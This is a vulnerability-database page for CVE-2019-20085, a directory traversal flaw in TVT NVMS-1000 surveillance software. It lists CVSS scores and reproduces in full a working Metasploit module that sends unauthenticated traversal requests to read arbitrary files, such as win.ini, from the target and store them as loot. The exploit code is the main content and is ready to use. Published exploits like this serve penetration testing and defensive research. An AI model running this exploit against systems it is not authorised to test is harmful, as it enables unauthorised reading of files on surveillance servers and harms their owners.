Lucene search

K
packetstormDhiraj Mishra, numan turle, metasploit.comPACKETSTORM:181025
HistorySep 01, 2024 - 12:00 a.m.

TVT NVMS-1000 Directory Traversal

2024-09-0100:00:00
Dhiraj Mishra, numan turle, metasploit.com
packetstormsecurity.com
25
tvt network surveillance management software
directory traversal
vulnerability
version 3.4.1
port 80
cve-2019-20085
edb-47774
unauthenticated
metasploit
http client

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7

Confidence

Low

EPSS

0.643

Percentile

97.9%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'TVT NVMS-1000 Directory Traversal',  
'Description' => %q{  
This module exploits an unauthenticated directory traversal vulnerability which  
exists in TVT network surveillance management software-1000 version 3.4.1.  
NVMS listens by default on port 80.  
},  
'References' =>  
[  
['CVE', '2019-20085'],  
['EDB', '47774']  
],  
'Author' =>  
[  
'Numan TΓΌrle', # Vulnerability discovery  
'Dhiraj Mishra' # Metasploit module  
],  
'DisclosureDate' => '2019-12-12',  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),  
OptString.new('TARGETURI', [true, "The base URI path of nvms", '/']),  
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])  
])  
end  
  
def run_host(ip)  
filename = datastore['FILEPATH']  
traversal = normalize_uri(target_uri.path, '/../' * datastore['DEPTH'], filename)  
  
res = send_request_raw({  
'method' => 'GET',  
'uri' => traversal  
})  
  
unless res && res.code == 200  
print_error('Nothing was downloaded')  
return  
end  
  
print_good("#{peer} - Downloaded #{res.body.length} bytes")  
path = store_loot(  
'nvms.traversal',  
'text/plain',  
ip,  
res.body,  
filename  
)  
print_good("File saved in: #{path}")  
end  
end  
`

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7

Confidence

Low

EPSS

0.643

Percentile

97.9%